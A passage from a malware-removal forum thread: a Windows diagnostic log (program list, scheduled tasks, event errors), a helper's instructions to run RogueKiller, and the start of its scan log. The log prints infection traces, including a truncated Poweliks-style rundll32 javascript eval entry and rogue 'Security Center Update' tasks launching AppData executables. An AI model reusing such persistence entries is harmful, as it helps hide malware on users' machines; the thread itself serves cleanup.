Trials Evolution Gold Edition (HKLM-x32\...\InstallShield_{07D857B8-C956-401D-BC8F-EDA8459AF037}) (Version: 1.0.0.5 - Ubisoft)
Trials Evolution Gold Edition (x32 Version: 1.0.0.5 - Ubisoft) Hidden
TVPaint Animation 10.0 Professional Edition (32bits) (DEMO) (remove only) (HKLM-x32\...\TVP Animation 10 Pro DEMO) (Version:  - )
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-3d519be7-e7af-4b69-98ba-bbe1e7c83c74) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-8d7ec19c-13f9-47d2-a017-ad26215fc52e) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2014-02 (HKLM\...\UDK-2b78b7b2-e686-42c1-8f7c-2fe04f20f2ab) (Version:  - Epic Games, Inc.)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Nelson Sexton)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 3.0 - Ubisoft)
Uplink (HKLM-x32\...\Steam App 1510) (Version:  - Introversion Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-4 - Wacom Technology Corp.)
Warhammer 40,000: Dawn of War - Game of the Year Edition (HKLM-x32\...\Steam App 4570) (Version:  - Relic)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
Why ASUS PC (HKLM-x32\...\{5648F9D9-299E-408C-AC1F-59DC75894A1F}) (Version: 1.00.02 - ASUSTeK Computer Inc.)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 3.6 - Bazis)
Windows Frotz (HKLM-x32\...\WindowsFrotz) (Version:  - )
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Software Development Kit EULA (x32 Version: 8.100.25984 - Microsoft Corporations) Hidden
Windows Software Development Kit for Windows 8.1 (HKLM-x32\...\{25981ccc-475f-4b68-850b-89d3fc287ff1}) (Version: 8.100.26695 - Microsoft Corporation)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WorldPainter 1.7.1 (HKLM-x32\...\4144-4862-0472-7103) (Version: 1.7.1 - pepsoft.org)
Wrye Bash (HKLM-x32\...\Wrye Bash) (Version: 3.0.4.4 - Wrye & Wrye Bash Development Team)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.2) (Version: 1.3.3 - Xvid Team)
Zombie Panic Source (HKLM-x32\...\Steam App 17500) (Version:  - Zombie Panic Team)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1557230296-4363482-4078292831-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
20-10-2014 05:46:44 Scheduled Checkpoint
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {05E6FA5F-1C8C-4730-B0C9-BB8640B82410} - \Security Center Update - 467669557 No Task File <==== ATTENTION
Task: {0EF4A154-FEBC-487D-A6B4-912C12223112} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {312699F1-CA91-4A62-9438-A029F13EDF91} - System32\Tasks\Security Center Update - 2903558157 => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: {3C1DF4E4-F642-455C-B31F-F3CFE7874AB6} - \Security Center Update - 2617606942 No Task File <==== ATTENTION
Task: {4462CF66-3BFB-4F46-8DAA-EB8E5BAD58CB} - System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC} => C:\Users\RaRWolf\AppData\Roaming\qxigf.dll [2014-10-10] () <==== ATTENTION
Task: {4CCC414B-6206-4F06-B5E5-7584E810198B} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {52701CBC-326F-4144-8460-9112025E8F42} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-09] (Adobe Systems Incorporated)
Task: {5F57C186-31CD-42F4-ACD6-3D3215E5F1A0} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {79C28478-DF06-4C6F-9F86-5748287A02E4} - System32\Tasks\Security Center Update - 1765064875 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: {7C755F3D-C1EB-4B49-9434-793B6F26B785} - System32\Tasks\Security Center Update - 3029572363 => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: {81E2736B-9DF6-4525-845F-19F64C31F0F9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {93039A7B-8D28-42CE-9895-9E7E80712996} - System32\Tasks\Security Center Update - 3324824421 => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: {9EAC1F9E-8030-4FA0-9943-54C3E87D7310} - System32\Tasks\ASUS\ASUS AI Suite II Execute => C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe [2012-03-13] (ASUSTeK Computer Inc.)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {C4B13F0C-D6C8-4368-A7BA-2C2DFE7ADF7E} - \Security Center Update - 2602486151 No Task File <==== ATTENTION
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {D43C5E37-B7AD-445F-8415-C2C1DD8BF3A1} - System32\Tasks\Security Center Update - 258622643 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: {E34A9BB2-F45E-455D-919E-0C128F63BF19} - System32\Tasks\ASUS\ASUS Dr.Net Execute => C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe [2012-04-30] (ASUSTeK Computer Inc.)
Task: {E35650CE-6560-457C-9313-A69CE343EEC5} - System32\Tasks\Security Center Update - 3847798286 => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {F02E324B-C8AA-44A7-91FC-0EB0DB7F7590} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {F5166EA7-D58B-459C-B0E4-B28084AF2299} - System32\Tasks\AdobeAAMUpdater-1.0-Shoobledooble-RaRWolf => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {F5F52209-55E5-40EC-8B34-A8140C33E1E3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 1765064875.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 258622643.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2903558157.job => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3029572363.job => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3324824421.job => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3847798286.job => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
 
==================== Loaded Modules (whitelisted) =============
 
2013-12-16 23:52 - 2014-05-19 21:25 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-09-14 05:05 - 2012-06-01 05:42 - 00920736 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
2012-06-18 11:24 - 2012-06-18 11:24 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2013-01-12 13:00 - 2014-06-30 11:32 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2014-06-27 00:17 - 2014-04-21 18:30 - 01356568 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-14 05:05 - 2014-10-19 21:16 - 00024576 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\PEbiosinterface32.dll
2012-09-14 05:05 - 2010-06-28 22:58 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\ATKEX.dll
2014-10-18 17:10 - 2014-10-09 22:03 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libglesv2.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libegl.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ffmpegsumo.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 01171456 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00442368 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2013-03-12 17:10 - 2014-10-01 19:16 - 00774656 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2014-05-21 17:41 - 2014-10-21 15:22 - 02226880 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00403968 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-12-26 16:38 - 2014-10-21 15:22 - 00682176 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2012-12-26 16:38 - 2014-09-04 19:29 - 34589376 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-08-14 20:06 - 2014-09-04 19:29 - 00837824 _____ () C:\Program Files (x86)\Steam\bin\ffmpegsumo.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\fsthvckq.sys:changelist
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "amd_dc_opt"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKCU\...\StartupApproved\Run: => "Skype"
HKCU\...\StartupApproved\Run: => "whatpulse"
HKCU\...\StartupApproved\Run: => "uTorrent"
HKCU\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKCU\...\StartupApproved\Run: => "Desura"
HKCU\...\StartupApproved\Run: => "MurGee.com Auto Clicker"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1557230296-4363482-4078292831-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1557230296-4363482-4078292831-1005 - Limited - Enabled)
Guest (S-1-5-21-1557230296-4363482-4078292831-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1557230296-4363482-4078292831-1004 - Limited - Enabled)
RaRWolf (S-1-5-21-1557230296-4363482-4078292831-1002 - Administrator - Enabled) => C:\Users\RaRWolf
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/22/2014 05:08:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x17b8c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/22/2014 04:42:34 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 04:44:04 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 01:03:50 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 00:45:12 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 09:12:49 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 06:33:26 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
]
 
Error: (10/21/2014 06:25:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0xda5c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/21/2014 03:03:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/20/2014 03:17:47 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"1".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
 
System errors:
=============
Error: (10/22/2014 05:18:46 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:45 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:38 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:37 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:32 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:30 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:29 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/22/2014 05:18:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
Microsoft Office Sessions:
=========================
Error: (10/22/2014 05:08:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d017b8c01cfee3c4205f880C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll8d5d6647-5a2f-11e4-bf1c-3085a9a720f7
 
Error: (10/22/2014 04:42:34 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 04:44:04 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 01:03:50 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/22/2014 00:45:12 AM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 09:12:49 PM) (Source: COM) (EventID: 18221) (User: Shoobledooble)
Description: C:\Windows\SysWow64\dllhost.exeShoobledoobleRaRWolfS-1-5-21-1557230296-4363482-4078292831-1002UnavailableUnavailable
 
Error: (10/21/2014 06:33:26 PM) (Source: VSS) (EventID: 13) (User: )
Description: {e579ab5f-1cc4-44b4-bed9-de0991ff0623}Coordinator0x80070005, Access is denied.
 
Error: (10/21/2014 06:25:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0da5c01cfed7df5043988C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll33184be0-5971-11e4-bf1c-3085a9a720f7
 
Error: (10/21/2014 03:03:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{7722483A-5FB8-4A2E-9422-6DA527A9173F}\recordingmanager.exe
 
Error: (10/20/2014 03:17:47 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0"C:\Windows\Installer\{7722483A-5FB8-4A2E-9422-6DA527A9173F}\recordingmanager.exe
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-12-16 21:57:35.239
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-16 21:57:26.378
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:33.532
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:09.428
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:31.388
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:10.452
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:36.351
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:17.007
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:24.425
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:18.107
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: AMD A8-5500 APU with Radeon™ HD Graphics 
Percentage of memory in use: 86%
Total physical RAM: 8156.38 MB
Available physical RAM: 1133.28 MB
Total Pagefile: 17988.59 MB
Available Pagefile: 7075.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:918.55 GB) (Free:49.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (Tablet_CD) (CDROM) (Total:0.12 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5F075A5E)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#6 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 22 October 2014 - 05:05 PM

You've got enormous amount of junk. Long time not seen that infected machine...



RogueKiller.png Scan with RogueKiller

Please download RogueKiller and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on RogueKiller.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait patiently until the pre-scan will be done. It shouldn't take more than 2-3 minutes.
  • Accept the Terms of use.
  • When the Scan button becomes available, please click it. RogueKiller will start a full scan.
  • Let this process run uninterrupted!.
  • When finished, a Report button will become available. Click it. You will be presented with a logfile.

Please include the content of this logfile in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#7 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 23 October 2014 - 04:56 PM

RogueKiller V10.0.3.0 (x64) [Oct 16 2014] by Adlice Software

 
Operating System : Windows 8 (6.2.9200 ) 64 bits version
Started in : Normal mode
User : RaRWolf [Administrator]
Mode : Delete -- Date : 10/23/2014  17:54:53
 
¤¤¤ Processes : 8 ¤¤¤
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermProc]
[Proc.Svchost] svchost.exe -- C:\Windows\system32\svchost.exe[-] -> Killed [TermProc]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
